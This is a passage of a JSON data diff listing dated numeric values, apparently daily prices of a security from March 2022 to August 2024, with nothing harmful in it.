], + [ + "2022-03-25", + 27.187744140625 + ], + [ + "2022-03-28", + 28.424638748168945 + ], + [ + "2022-03-29", + 29.88121223449707 + ], + [ + "2022-03-30", + 28.983388900756836 + ], + [ + "2022-03-31", + 27.784700393676758 + ], + [ + "2022-04-01", + 27.665307998657227 + ], + [ + "2022-04-04", + 29.394094467163086 + ], + [ + "2022-04-05", + 27.450407028198242 + ], + [ + "2022-04-06", + 25.645214080810547 + ], + [ + "2022-04-07", + 25.812362670898438 + ], + [ + "2022-04-08", + 24.756946563720703 + ], + [ + "2022-04-11", + 22.9995059967041 + ], + [ + "2022-04-12", + 22.703413009643555 + ], + [ + "2022-04-13", + 24.064476013183594 + ], + [ + "2022-04-14", + 22.44552993774414 + ], + [ + "2022-04-18", + 22.50761604309082 + ], + [ + "2022-04-19", + 23.954635620117188 + ], + [ + "2022-04-20", + 22.87534523010254 + ], + [ + "2022-04-21", + 21.53338050842285 + ], + [ + "2022-04-22", + 19.82370376586914 + ], + [ + "2022-04-25", + 20.559146881103516 + ], + [ + "2022-04-26", + 18.247743606567383 + ], + [ + "2022-04-27", + 18.166555404663086 + ], + [ + "2022-04-28", + 20.086362838745117 + ], + [ + "2022-04-29", + 17.445430755615234 + ], + [ + "2022-05-02", + 18.266843795776367 + ], + [ + "2022-05-03", + 18.3098201751709 + ], + [ + "2022-05-04", + 20.12456512451172 + ], + [ + "2022-05-05", + 17.125463485717773 + ], + [ + "2022-05-06", + 16.528505325317383 + ], + [ + "2022-05-09", + 14.575267791748047 + ], + [ + "2022-05-10", + 15.07671070098877 + ], + [ + "2022-05-11", + 13.73475456237793 + ], + [ + "2022-05-12", + 13.624916076660156 + ], + [ + "2022-05-13", + 15.105362892150879 + ], + [ + "2022-05-16", + 14.637351036071777 + ], + [ + "2022-05-17", + 15.740525245666504 + ], + [ + "2022-05-18", + 13.443439483642578 + ], + [ + "2022-05-19", + 13.171229362487793 + ], + [ + "2022-05-20", + 13.056612014770508 + ], + [ + "2022-05-23", + 13.701325416564941 + ], + [ + "2022-05-24", + 12.84648609161377 + ], + [ + "2022-05-25", + 13.362255096435547 + ], + [ + "2022-05-26", + 14.479755401611328 + ], + [ + "2022-05-27", + 15.898122787475586 + ], + [ + "2022-05-31", + 15.7835054397583 + ], + [ + "2022-06-01", + 15.41578197479248 + ], + [ + "2022-06-02", + 16.667001724243164 + ], + [ + "2022-06-03", + 15.348923683166504 + ], + [ + "2022-06-06", + 15.539950370788574 + ], + [ + "2022-06-07", + 15.917226791381836 + ], + [ + "2022-06-08", + 15.59248161315918 + ], + [ + "2022-06-09", + 14.322157859802246 + ], + [ + "2022-06-10", + 12.793953895568848 + ], + [ + "2022-06-13", + 11.02219009399414 + ], + [ + "2022-06-14", + 11.093823432922363 + ], + [ + "2022-06-15", + 11.891357421875 + ], + [ + "2022-06-16", + 10.439559936523438 + ], + [ + "2022-06-17", + 10.82638931274414 + ], + [ + "2022-06-21", + 11.643021583557129 + ], + [ + "2022-06-22", + 11.600042343139648 + ], + [ + "2022-06-23", + 12.096708297729492 + ], + [ + "2022-06-24", + 13.362255096435547 + ], + [ + "2022-06-27", + 13.0470609664917 + ], + [ + "2022-06-28", + 11.857926368713379 + ], + [ + "2022-06-29", + 11.881805419921875 + ], + [ + "2022-06-30", + 11.461546897888184 + ], + [ + "2022-07-01", + 11.647796630859375 + ], + [ + "2022-07-05", + 12.249528884887695 + ], + [ + "2022-07-06", + 12.48353385925293 + ], + [ + "2022-07-07", + 13.25718879699707 + ], + [ + "2022-07-08", + 13.319273948669434 + ], + [ + "2022-07-11", + 12.469208717346191 + ], + [ + "2022-07-12", + 12.106261253356934 + ], + [ + "2022-07-13", + 12.029850006103516 + ], + [ + "2022-07-14", + 12.154016494750977 + ], + [ + "2022-07-15", + 12.793953895568848 + ], + [ + "2022-07-18", + 12.4978609085083 + ], + [ + "2022-07-19", + 13.591484069824219 + ], + [ + "2022-07-20", + 14.274404525756836 + ], + [ + "2022-07-21", + 14.880910873413086 + ], + [ + "2022-07-22", + 14.1024808883667 + ], + [ + "2022-07-25", + 13.892350196838379 + ], + [ + "2022-07-26", + 13.051836967468262 + ], + [ + "2022-07-27", + 14.68033218383789 + ], + [ + "2022-07-28", + 15.100589752197266 + ], + [ + "2022-07-29", + 15.931550025939941 + ], + [ + "2022-08-01", + 15.907674789428711 + ], + [ + "2022-08-02", + 15.759629249572754 + ], + [ + "2022-08-03", + 17.020397186279297 + ], + [ + "2022-08-04", + 17.26395606994629 + ], + [ + "2022-08-05", + 16.853248596191406 + ], + [ + "2022-08-08", + 16.68132972717285 + ], + [ + "2022-08-09", + 16.108247756958008 + ], + [ + "2022-08-10", + 17.43110466003418 + ], + [ + "2022-08-11", + 17.168445587158203 + ], + [ + "2022-08-12", + 18.137901306152344 + ], + [ + "2022-08-15", + 18.572481155395508 + ], + [ + "2022-08-16", + 18.453092575073242 + ], + [ + "2022-08-17", + 17.81315803527832 + ], + [ + "2022-08-18", + 17.93255043029785 + ], + [ + "2022-08-19", + 16.88190269470215 + ], + [ + "2022-08-22", + 15.55427360534668 + ], + [ + "2022-08-23", + 15.501744270324707 + ], + [ + "2022-08-24", + 15.621132850646973 + ], + [ + "2022-08-25", + 16.442546844482422 + ], + [ + "2022-08-26", + 14.441553115844727 + ], + [ + "2022-08-29", + 13.997417449951172 + ], + [ + "2022-08-30", + 13.529403686523438 + ], + [ + "2022-08-31", + 13.281068801879883 + ], + [ + "2022-09-01", + 13.295395851135254 + ], + [ + "2022-09-02", + 12.741421699523926 + ], + [ + "2022-09-06", + 12.45010757446289 + ], + [ + "2022-09-07", + 13.185555458068848 + ], + [ + "2022-09-08", + 13.400459289550781 + ], + [ + "2022-09-09", + 14.250523567199707 + ], + [ + "2022-09-12", + 14.77107048034668 + ], + [ + "2022-09-13", + 12.340267181396484 + ], + [ + "2022-09-14", + 12.617254257202148 + ], + [ + "2022-09-15", + 11.982091903686523 + ], + [ + "2022-09-16", + 11.748087882995605 + ], + [ + "2022-09-19", + 12.029850006103516 + ], + [ + "2022-09-20", + 11.743310928344727 + ], + [ + "2022-09-21", + 11.098599433898926 + ], + [ + "2022-09-22", + 10.68789291381836 + ], + [ + "2022-09-23", + 10.176898956298828 + ], + [ + "2022-09-26", + 10.038407325744629 + ], + [ + "2022-09-27", + 10.047958374023438 + ], + [ + "2022-09-28", + 10.635360717773438 + ], + [ + "2022-09-29", + 9.737540245056152 + ], + [ + "2022-09-30", + 9.226546287536621 + ], + [ + "2022-10-03", + 9.866480827331543 + ], + [ + "2022-10-04", + 10.783408164978027 + ], + [ + "2022-10-05", + 10.783408164978027 + ], + [ + "2022-10-06", + 10.511194229125977 + ], + [ + "2022-10-07", + 9.312507629394531 + ], + [ + "2022-10-10", + 9.02119255065918 + ], + [ + "2022-10-11", + 8.663019180297852 + ], + [ + "2022-10-12", + 8.643916130065918 + ], + [ + "2022-10-13", + 9.221770286560059 + ], + [ + "2022-10-14", + 8.39080810546875 + ], + [ + "2022-10-17", + 9.216994285583496 + ], + [ + "2022-10-18", + 9.4462251663208 + ], + [ + "2022-10-19", + 9.331608772277832 + ], + [ + "2022-10-20", + 9.174012184143066 + ], + [ + "2022-10-21", + 9.823501586914062 + ], + [ + "2022-10-24", + 10.157796859741211 + ], + [ + "2022-10-25", + 10.76907730102539 + ], + [ + "2022-10-26", + 10.05750846862793 + ], + [ + "2022-10-27", + 9.503532409667969 + ], + [ + "2022-10-28", + 10.363149642944336 + ], + [ + "2022-10-31", + 10.004976272583008 + ], + [ + "2022-11-01", + 9.694559097290039 + ], + [ + "2022-11-02", + 8.69167423248291 + ], + [ + "2022-11-03", + 8.190231323242188 + ], + [ + "2022-11-04", + 8.572283744812012 + ], + [ + "2022-11-07", + 8.844493865966797 + ], + [ + "2022-11-08", + 9.035518646240234 + ], + [ + "2022-11-09", + 8.405134201049805 + ], + [ + "2022-11-10", + 10.243759155273438 + ], + [ + "2022-11-11", + 10.82638931274414 + ], + [ + "2022-11-14", + 10.539849281311035 + ], + [ + "2022-11-15", + 10.964879989624023 + ], + [ + "2022-11-16", + 10.520745277404785 + ], + [ + "2022-11-17", + 10.439559936523438 + ], + [ + "2022-11-18", + 10.430008888244629 + ], + [ + "2022-11-21", + 10.114814758300781 + ], + [ + "2022-11-22", + 10.539849281311035 + ], + [ + "2022-11-23", + 10.85504150390625 + ], + [ + "2022-11-25", + 10.630586624145508 + ], + [ + "2022-11-28", + 10.162571907043457 + ], + [ + "2022-11-29", + 9.919013023376465 + ], + [ + "2022-11-30", + 11.251420021057129 + ], + [ + "2022-12-01", + 11.31350326538086 + ], + [ + "2022-12-02", + 11.179786682128906 + ], + [ + "2022-12-05", + 10.61625862121582 + ], + [ + "2022-12-06", + 9.942891120910645 + ], + [ + "2022-12-07", + 9.823501586914062 + ], + [ + "2022-12-08", + 10.172124862670898 + ], + [ + "2022-12-09", + 9.976323127746582 + ], + [ + "2022-12-12", + 10.339271545410156 + ], + [ + "2022-12-13", + 10.664015769958496 + ], + [ + "2022-12-14", + 10.410906791687012 + ], + [ + "2022-12-15", + 9.379366874694824 + ], + [ + "2022-12-16", + 9.102378845214844 + ], + [ + "2022-12-19", + 8.725103378295898 + ], + [ + "2022-12-20", + 8.686897277832031 + ], + [ + "2022-12-21", + 9.06417465209961 + ], + [ + "2022-12-22", + 8.419957160949707 + ], + [ + "2022-12-23", + 8.443957328796387 + ], + [ + "2022-12-27", + 8.083927154541016 + ], + [ + "2022-12-28", + 7.7574968338012695 + ], + [ + "2022-12-29", + 8.3047456741333 + ], + [ + "2022-12-30", + 8.3047456741333 + ], + [ + "2023-01-03", + 8.117527961730957 + ], + [ + "2023-01-04", + 8.242340087890625 + ], + [ + "2023-01-05", + 7.853505611419678 + ], + [ + "2023-01-06", + 8.467960357666016 + ], + [ + "2023-01-09", + 8.645576477050781 + ], + [ + "2023-01-10", + 8.875997543334961 + ], + [ + "2023-01-11", + 9.317638397216797 + ], + [ + "2023-01-12", + 9.461648941040039 + ], + [ + "2023-01-13", + 9.6488676071167 + ], + [ + "2023-01-17", + 9.70167064666748 + ], + [ + "2023-01-18", + 9.341638565063477 + ], + [ + "2023-01-19", + 9.048811912536621 + ], + [ + "2023-01-20", + 9.788079261779785 + ], + [ + "2023-01-23", + 10.431336402893066 + ], + [ + "2023-01-24", + 10.368931770324707 + ], + [ + "2023-01-25", + 10.29212474822998 + ], + [ + "2023-01-26", + 10.887377738952637 + ], + [ + "2023-01-27", + 11.199406623840332 + ], + [ + "2023-01-30", + 10.52734661102295 + ], + [ + "2023-01-31", + 10.997786521911621 + ], + [ + "2023-02-01", + 11.708250045776367 + ], + [ + "2023-02-02", + 12.917959213256836 + ], + [ + "2023-02-03", + 12.250699996948242 + ], + [ + "2023-02-06", + 11.93867301940918 + ], + [ + "2023-02-07", + 12.677937507629395 + ], + [ + "2023-02-08", + 11.99627685546875 + ], + [ + "2023-02-09", + 11.674649238586426 + ], + [ + "2023-02-10", + 11.4346284866333 + ], + [ + "2023-02-13", + 11.977076530456543 + ], + [ + "2023-02-14", + 12.236297607421875 + ], + [ + "2023-02-15", + 12.509922981262207 + ], + [ + "2023-02-16", + 11.794659614562988 + ], + [ + "2023-02-17", + 11.540234565734863 + ], + [ + "2023-02-21", + 10.728963851928711 + ], + [ + "2023-02-22", + 10.738565444946289 + ], + [ + "2023-02-23", + 11.007387161254883 + ], + [ + "2023-02-24", + 10.450539588928223 + ], + [ + "2023-02-27", + 10.676159858703613 + ], + [ + "2023-02-28", + 10.6233549118042 + ], + [ + "2023-03-01", + 10.364131927490234 + ], + [ + "2023-03-02", + 10.613753318786621 + ], + [ + "2023-03-03", + 11.261811256408691 + ], + [ + "2023-03-06", + 11.309816360473633 + ], + [ + "2023-03-07", + 10.887377738952637 + ], + [ + "2023-03-08", + 11.036189079284668 + ], + [ + "2023-03-09", + 10.455339431762695 + ], + [ + "2023-03-10", + 10.023299217224121 + ], + [ + "2023-03-13", + 10.23931884765625 + ], + [ + "2023-03-14", + 10.935382843017578 + ], + [ + "2023-03-15", + 11.093796730041504 + ], + [ + "2023-03-16", + 11.972275733947754 + ], + [ + "2023-03-17", + 11.794659614562988 + ], + [ + "2023-03-20", + 11.919469833374023 + ], + [ + "2023-03-21", + 12.423516273498535 + ], + [ + "2023-03-22", + 11.916531562805176 + ], + [ + "2023-03-23", + 12.341432571411133 + ], + [ + "2023-03-24", + 12.466971397399902 + ], + [ + "2023-03-27", + 12.211064338684082 + ], + [ + "2023-03-28", + 12.008272171020508 + ], + [ + "2023-03-29", + 12.664935111999512 + ], + [ + "2023-03-30", + 13.007756233215332 + ], + [ + "2023-03-31", + 13.645105361938477 + ], + [ + "2023-04-03", + 13.54853630065918 + ], + [ + "2023-04-04", + 13.413339614868164 + ], + [ + "2023-04-05", + 12.983610153198242 + ], + [ + "2023-04-06", + 13.244346618652344 + ], + [ + "2023-04-10", + 13.215375900268555 + ], + [ + "2023-04-11", + 12.959468841552734 + ], + [ + "2023-04-12", + 12.616649627685547 + ], + [ + "2023-04-13", + 13.340914726257324 + ], + [ + "2023-04-14", + 13.263659477233887 + ], + [ + "2023-04-17", + 13.278145790100098 + ], + [ + "2023-04-18", + 13.287801742553711 + ], + [ + "2023-04-19", + 13.258831024169922 + ], + [ + "2023-04-20", + 12.949812889099121 + ], + [ + "2023-04-21", + 12.973954200744629 + ], + [ + "2023-04-24", + 12.896699905395508 + ], + [ + "2023-04-25", + 12.167610168457031 + ], + [ + "2023-04-26", + 12.370403289794922 + ], + [ + "2023-04-27", + 13.369884490966797 + ], + [ + "2023-04-28", + 13.640275955200195 + ], + [ + "2023-05-01", + 13.601649284362793 + ], + [ + "2023-05-02", + 13.239518165588379 + ], + [ + "2023-05-03", + 12.978782653808594 + ], + [ + "2023-05-04", + 12.833930015563965 + ], + [ + "2023-05-05", + 13.62096118927002 + ], + [ + "2023-05-08", + 13.732017517089844 + ], + [ + "2023-05-09", + 13.466452598571777 + ], + [ + "2023-05-10", + 13.90101146697998 + ], + [ + "2023-05-11", + 14.016894340515137 + ], + [ + "2023-05-12", + 13.872039794921875 + ], + [ + "2023-05-15", + 14.084492683410645 + ], + [ + "2023-05-16", + 14.137602806091309 + ], + [ + "2023-05-17", + 14.644585609436035 + ], + [ + "2023-05-18", + 15.43161678314209 + ], + [ + "2023-05-19", + 15.325392723083496 + ], + [ + "2023-05-22", + 15.484731674194336 + ], + [ + "2023-05-23", + 14.886007308959961 + ], + [ + "2023-05-24", + 14.644585609436035 + ], + [ + "2023-05-25", + 15.702011108398438 + ], + [ + "2023-05-26", + 16.889799118041992 + ], + [ + "2023-05-30", + 17.12639617919922 + ], + [ + "2023-05-31", + 16.778745651245117 + ], + [ + "2023-06-01", + 17.387126922607422 + ], + [ + "2023-06-02", + 17.778228759765625 + ], + [ + "2023-06-05", + 17.816856384277344 + ], + [ + "2023-06-06", + 17.797542572021484 + ], + [ + "2023-06-07", + 16.889799118041992 + ], + [ + "2023-06-08", + 17.469207763671875 + ], + [ + "2023-06-09", + 17.68166160583496 + ], + [ + "2023-06-12", + 18.58457374572754 + ], + [ + "2023-06-13", + 18.999818801879883 + ], + [ + "2023-06-14", + 19.40540313720703 + ], + [ + "2023-06-15", + 20.086210250854492 + ], + [ + "2023-06-16", + 19.699939727783203 + ], + [ + "2023-06-20", + 19.60336685180664 + ], + [ + "2023-06-21", + 18.817726135253906 + ], + [ + "2023-06-22", + 19.442562103271484 + ], + [ + "2023-06-23", + 18.86616325378418 + ], + [ + "2023-06-26", + 18.12023162841797 + ], + [ + "2023-06-27", + 19.016319274902344 + ], + [ + "2023-06-28", + 19.132564544677734 + ], + [ + "2023-06-29", + 19.001785278320312 + ], + [ + "2023-06-30", + 19.859113693237305 + ], + [ + "2023-07-03", + 19.99474334716797 + ], + [ + "2023-07-05", + 19.980209350585938 + ], + [ + "2023-07-06", + 19.510372161865234 + ], + [ + "2023-07-07", + 19.31178092956543 + ], + [ + "2023-07-10", + 19.326313018798828 + ], + [ + "2023-07-11", + 19.602407455444336 + ], + [ + "2023-07-12", + 20.32895278930664 + ], + [ + "2023-07-13", + 21.34128761291504 + ], + [ + "2023-07-14", + 21.32191276550293 + ], + [ + "2023-07-17", + 21.912843704223633 + ], + [ + "2023-07-18", + 22.43596076965332 + ], + [ + "2023-07-19", + 22.43596076965332 + ], + [ + "2023-07-20", + 20.861759185791016 + ], + [ + "2023-07-21", + 20.67770004272461 + ], + [ + "2023-07-24", + 20.760040283203125 + ], + [ + "2023-07-25", + 21.17660140991211 + ], + [ + "2023-07-26", + 20.95863151550293 + ], + [ + "2023-07-27", + 20.7794189453125 + ], + [ + "2023-07-28", + 21.903156280517578 + ], + [ + "2023-07-31", + 21.946748733520508 + ], + [ + "2023-08-01", + 21.7772159576416 + ], + [ + "2023-08-02", + 20.353172302246094 + ], + [ + "2023-08-03", + 20.20786476135254 + ], + [ + "2023-08-04", + 19.92692756652832 + ], + [ + "2023-08-07", + 20.420988082885742 + ], + [ + "2023-08-08", + 19.89786720275879 + ], + [ + "2023-08-09", + 19.234281539916992 + ], + [ + "2023-08-10", + 19.32146644592285 + ], + [ + "2023-08-11", + 18.933971405029297 + ], + [ + "2023-08-14", + 19.56365394592285 + ], + [ + "2023-08-15", + 18.963037490844727 + ], + [ + "2023-08-16", + 18.333354949951172 + ], + [ + "2023-08-17", + 17.713363647460938 + ], + [ + "2023-08-18", + 17.631023406982422 + ], + [ + "2023-08-21", + 18.483510971069336 + ], + [ + "2023-08-22", + 18.401165008544922 + ], + [ + "2023-08-23", + 19.268186569213867 + ], + [ + "2023-08-24", + 17.999143600463867 + ], + [ + "2023-08-25", + 18.42538833618164 + ], + [ + "2023-08-28", + 18.837100982666016 + ], + [ + "2023-08-29", + 20.038331985473633 + ], + [ + "2023-08-30", + 20.372549057006836 + ], + [ + "2023-08-31", + 20.556608200073242 + ], + [ + "2023-09-01", + 20.48395347595215 + ], + [ + "2023-09-05", + 20.537233352661133 + ], + [ + "2023-09-06", + 19.99474334716797 + ], + [ + "2023-09-07", + 19.558809280395508 + ], + [ + "2023-09-08", + 19.616931915283203 + ], + [ + "2023-09-11", + 20.285362243652344 + ], + [ + "2023-09-12", + 19.636310577392578 + ], + [ + "2023-09-13", + 19.830055236816406 + ], + [ + "2023-09-14", + 20.2950496673584 + ], + [ + "2023-09-15", + 19.2536563873291 + ], + [ + "2023-09-18", + 19.297252655029297 + ], + [ + "2023-09-19", + 19.18100357055664 + ], + [ + "2023-09-20", + 18.349328994750977 + ], + [ + "2023-09-21", + 17.30426788330078 + ], + [ + "2023-09-22", + 17.3188533782959 + ], + [ + "2023-09-25", + 17.54730224609375 + ], + [ + "2023-09-26", + 16.764726638793945 + ], + [ + "2023-09-27", + 16.866798400878906 + ], + [ + "2023-09-28", + 17.275104522705078 + ], + [ + "2023-09-29", + 17.31398582458496 + ], + [ + "2023-10-02", + 17.727153778076172 + ], + [ + "2023-10-03", + 16.78902816772461 + ], + [ + "2023-10-04", + 17.469532012939453 + ], + [ + "2023-10-05", + 17.28482437133789 + ], + [ + "2023-10-06", + 18.15489387512207 + ], + [ + "2023-10-09", + 18.422239303588867 + ], + [ + "2023-10-10", + 18.723604202270508 + ], + [ + "2023-10-11", + 19.12218475341797 + ], + [ + "2023-10-12", + 18.898590087890625 + ], + [ + "2023-10-13", + 18.184062957763672 + ], + [ + "2023-10-16", + 18.796512603759766 + ], + [ + "2023-10-17", + 18.616668701171875 + ], + [ + "2023-10-18", + 17.8292293548584 + ], + [ + "2023-10-19", + 17.352872848510742 + ], + [ + "2023-10-20", + 16.57029151916504 + ], + [ + "2023-10-23", + 16.716115951538086 + ], + [ + "2023-10-24", + 17.187610626220703 + ], + [ + "2023-10-25", + 15.928675651550293 + ], + [ + "2023-10-26", + 15.000271797180176 + ], + [ + "2023-10-27", + 15.214143753051758 + ], + [ + "2023-10-30", + 15.70508098602295 + ], + [ + "2023-10-31", + 15.93353271484375 + ], + [ + "2023-11-01", + 16.755002975463867 + ], + [ + "2023-11-02", + 17.64451789855957 + ], + [ + "2023-11-03", + 18.26669692993164 + ], + [ + "2023-11-06", + 18.4757080078125 + ], + [ + "2023-11-07", + 18.995811462402344 + ], + [ + "2023-11-08", + 19.029836654663086 + ], + [ + "2023-11-09", + 18.577783584594727 + ], + [ + "2023-11-10", + 19.81727409362793 + ], + [ + "2023-11-13", + 19.63742446899414 + ], + [ + "2023-11-14", + 20.872058868408203 + ], + [ + "2023-11-15", + 20.930387496948242 + ], + [ + "2023-11-16", + 20.96440887451172 + ], + [ + "2023-11-17", + 20.97899055480957 + ], + [ + "2023-11-20", + 21.72754669189453 + ], + [ + "2023-11-21", + 21.33382797241211 + ], + [ + "2023-11-22", + 21.581724166870117 + ], + [ + "2023-11-24", + 21.474788665771484 + ], + [ + "2023-11-27", + 21.41160011291504 + ], + [ + "2023-11-28", + 21.581724166870117 + ], + [ + "2023-11-29", + 21.503952026367188 + ], + [ + "2023-11-30", + 21.324106216430664 + ], + [ + "2023-12-01", + 21.503952026367188 + ], + [ + "2023-12-04", + 20.891498565673828 + ], + [ + "2023-12-05", + 21.04218292236328 + ], + [ + "2023-12-06", + 20.66790199279785 + ], + [ + "2023-12-07", + 21.53311538696289 + ], + [ + "2023-12-08", + 21.79073715209961 + ], + [ + "2023-12-11", + 22.34486198425293 + ], + [ + "2023-12-12", + 22.884410858154297 + ], + [ + "2023-12-13", + 23.691295623779297 + ], + [ + "2023-12-14", + 23.65240478515625 + ], + [ + "2023-12-15", + 23.934328079223633 + ], + [ + "2023-12-18", + 24.434988021850586 + ], + [ + "2023-12-19", + 24.799541473388672 + ], + [ + "2023-12-20", + 23.697654724121094 + ], + [ + "2023-12-21", + 24.48366928100586 + ], + [ + "2023-12-22", + 24.581308364868164 + ], + [ + "2023-12-26", + 25.03046226501465 + ], + [ + "2023-12-27", + 25.162281036376953 + ], + [ + "2023-12-28", + 25.098814010620117 + ], + [ + "2023-12-29", + 24.752182006835938 + ], + [ + "2024-01-02", + 23.497488021850586 + ], + [ + "2024-01-03", + 22.74564552307129 + ], + [ + "2024-01-04", + 22.364843368530273 + ], + [ + "2024-01-05", + 22.447837829589844 + ], + [ + "2024-01-08", + 23.80017852783203 + ], + [ + "2024-01-09", + 23.956405639648438 + ], + [ + "2024-01-10", + 24.429967880249023 + ], + [ + "2024-01-11", + 24.54713249206543 + ], + [ + "2024-01-12", + 24.576431274414062 + ], + [ + "2024-01-16", + 24.561784744262695 + ], + [ + "2024-01-17", + 24.137041091918945 + ], + [ + "2024-01-18", + 25.17204475402832 + ], + [ + "2024-01-19", + 26.62690544128418 + ], + [ + "2024-01-22", + 26.734312057495117 + ], + [ + "2024-01-23", + 27.05164909362793 + ], + [ + "2024-01-24", + 27.49591827392578 + ], + [ + "2024-01-25", + 27.574031829833984 + ], + [ + "2024-01-26", + 27.066293716430664 + ], + [ + "2024-01-29", + 27.862071990966797 + ], + [ + "2024-01-30", + 27.305517196655273 + ], + [ + "2024-01-31", + 25.699312210083008 + ], + [ + "2024-02-01", + 26.607376098632812 + ], + [ + "2024-02-02", + 27.945070266723633 + ], + [ + "2024-02-05", + 27.80348777770996 + ], + [ + "2024-02-06", + 27.642377853393555 + ], + [ + "2024-02-07", + 28.467453002929688 + ], + [ + "2024-02-08", + 28.584623336791992 + ], + [ + "2024-02-09", + 29.424341201782227 + ], + [ + "2024-02-12", + 29.077713012695312 + ], + [ + "2024-02-13", + 27.70096778869629 + ], + [ + "2024-02-14", + 28.579742431640625 + ], + [ + "2024-02-15", + 28.8189640045166 + ], + [ + "2024-02-16", + 28.028066635131836 + ], + [ + "2024-02-20", + 27.37874984741211 + ], + [ + "2024-02-21", + 27.037002563476562 + ], + [ + "2024-02-22", + 29.375520706176758 + ], + [ + "2024-02-23", + 29.10700798034668 + ], + [ + "2024-02-26", + 29.067949295043945 + ], + [ + "2024-02-27", + 29.248584747314453 + ], + [ + "2024-02-28", + 28.7750244140625 + ], + [ + "2024-02-29", + 29.468280792236328 + ], + [ + "2024-03-01", + 30.820621490478516 + ], + [ + "2024-03-04", + 30.4544620513916 + ], + [ + "2024-03-05", + 28.82384490966797 + ], + [ + "2024-03-06", + 29.35599136352539 + ], + [ + "2024-03-07", + 30.66439437866211 + ], + [ + "2024-03-08", + 29.321819305419922 + ], + [ + "2024-03-11", + 28.980070114135742 + ], + [ + "2024-03-12", + 30.21036148071289 + ], + [ + "2024-03-13", + 29.507335662841797 + ], + [ + "2024-03-14", + 29.26811408996582 + ], + [ + "2024-03-15", + 28.19893455505371 + ], + [ + "2024-03-18", + 28.99471664428711 + ], + [ + "2024-03-19", + 29.19488525390625 + ], + [ + "2024-03-20", + 30.231170654296875 + ], + [ + "2024-03-21", + 30.623146057128906 + ], + [ + "2024-03-22", + 30.686843872070312 + ], + [ + "2024-03-25", + 30.373262405395508 + ], + [ + "2024-03-26", + 30.089078903198242 + ], + [ + "2024-03-27", + 30.35366439819336 + ], + [ + "2024-03-28", + 30.162578582763672 + ], + [ + "2024-04-01", + 30.348764419555664 + ], + [ + "2024-04-02", + 29.535411834716797 + ], + [ + "2024-04-03", + 29.731401443481445 + ], + [ + "2024-04-04", + 28.3300838470459 + ], + [ + "2024-04-05", + 29.329627990722656 + ], + [ + "2024-04-08", + 29.349227905273438 + ], + [ + "2024-04-09", + 29.65300750732422 + ], + [ + "2024-04-10", + 28.87395477294922 + ], + [ + "2024-04-11", + 30.231170654296875 + ], + [ + "2024-04-12", + 28.771059036254883 + ], + [ + "2024-04-15", + 27.32564926147461 + ], + [ + "2024-04-16", + 27.33054542541504 + ], + [ + "2024-04-17", + 26.316307067871094 + ], + [ + "2024-04-18", + 25.845937728881836 + ], + [ + "2024-04-19", + 24.243732452392578 + ], + [ + "2024-04-22", + 24.94928741455078 + ], + [ + "2024-04-23", + 26.0615234375 + ], + [ + "2024-04-24", + 26.316307067871094 + ], + [ + "2024-04-25", + 25.894935607910156 + ], + [ + "2024-04-26", + 27.085561752319336 + ], + [ + "2024-04-29", + 27.4089412689209 + ], + [ + "2024-04-30", + 25.84103775024414 + ], + [ + "2024-05-01", + 25.282468795776367 + ], + [ + "2024-05-02", + 26.218313217163086 + ], + [ + "2024-05-03", + 27.781320571899414 + ], + [ + "2024-05-06", + 28.692663192749023 + ], + [ + "2024-05-07", + 28.692663192749023 + ], + [ + "2024-05-08", + 28.63876724243164 + ], + [ + "2024-05-09", + 28.795557022094727 + ], + [ + "2024-05-10", + 28.991546630859375 + ], + [ + "2024-05-13", + 29.182632446289062 + ], + [ + "2024-05-14", + 29.726503372192383 + ], + [ + "2024-05-15", + 31.098417282104492 + ], + [ + "2024-05-16", + 30.907331466674805 + ], + [ + "2024-05-17", + 30.838733673095703 + ], + [ + "2024-05-20", + 31.475692749023438 + ], + [ + "2024-05-21", + 31.63738250732422 + ], + [ + "2024-05-22", + 31.617788314819336 + ], + [ + "2024-05-23", + 31.147415161132812 + ], + [ + "2024-05-24", + 32.01956558227539 + ], + [ + "2024-05-28", + 32.367435455322266 + ], + [ + "2024-05-29", + 31.691280364990234 + ], + [ + "2024-05-30", + 30.672142028808594 + ], + [ + "2024-05-31", + 30.63784408569336 + ], + [ + "2024-06-03", + 30.936729431152344 + ], + [ + "2024-06-04", + 31.16701316833496 + ], + [ + "2024-06-05", + 33.048500061035156 + ], + [ + "2024-06-06", + 33.00930404663086 + ], + [ + "2024-06-07", + 32.88680648803711 + ], + [ + "2024-06-10", + 33.234683990478516 + ], + [ + "2024-06-11", + 33.920650482177734 + ], + [ + "2024-06-12", + 35.25826644897461 + ], + [ + "2024-06-13", + 35.82173156738281 + ], + [ + "2024-06-14", + 36.34109878540039 + ], + [ + "2024-06-17", + 37.65911865234375 + ], + [ + "2024-06-18", + 37.678714752197266 + ], + [ + "2024-06-20", + 36.7918701171875 + ], + [ + "2024-06-21", + 36.45379638671875 + ], + [ + "2024-06-24", + 35.21906661987305 + ], + [ + "2024-06-25", + 36.394996643066406 + ], + [ + "2024-06-26", + 36.622718811035156 + ], + [ + "2024-06-27", + 36.88832473754883 + ], + [ + "2024-06-28", + 36.30794143676758 + ], + [ + "2024-07-01", + 36.903072357177734 + ], + [ + "2024-07-02", + 38.0343132019043 + ], + [ + "2024-07-03", + 38.96881866455078 + ], + [ + "2024-07-05", + 40.14924621582031 + ], + [ + "2024-07-08", + 40.41484069824219 + ], + [ + "2024-07-09", + 40.50337600708008 + ], + [ + "2024-07-10", + 41.77233123779297 + ], + [ + "2024-07-11", + 39.0278434753418 + ], + [ + "2024-07-12", + 39.66231918334961 + ], + [ + "2024-07-15", + 39.957427978515625 + ], + [ + "2024-07-16", + 39.986942291259766 + ], + [ + "2024-07-17", + 36.470252990722656 + ], + [ + "2024-07-18", + 35.92430114746094 + ], + [ + "2024-07-19", + 34.9504508972168 + ], + [ + "2024-07-22", + 36.47517013549805 + ], + [ + "2024-07-23", + 36.081695556640625 + ], + [ + "2024-07-24", + 32.19120407104492 + ], + [ + "2024-07-25", + 31.11898422241211 + ], + [ + "2024-07-26", + 32.00922393798828 + ], + [ + "2024-07-29", + 32.19613265991211 + ], + [ + "2024-07-30", + 30.88290023803711 + ], + [ + "2024-07-31", + 33.5831298828125 + ], + [ + "2024-08-01", + 31.163253784179688 + ], + [ + "2024-08-02", + 28.890933990478516 + ], + [ + "2024-08-05", + 26.37268829345703 + ], + [ + "2024-08-06", + 27.031757354736328 + ], + [ + "2024-08-07", + 26.16119384765625 + ], + [ + "2024-08-08", + 28.556476593017578 + ], + [ + "2024-08-09", + 28.945032119750977 + ], + [ + "2024-08-12", + 29.14177131652832 + ], + [ + "2024-08-13", + 31.261621475219727 + ], + [ + "2024-08-14", + 31.315725326538086 + ], 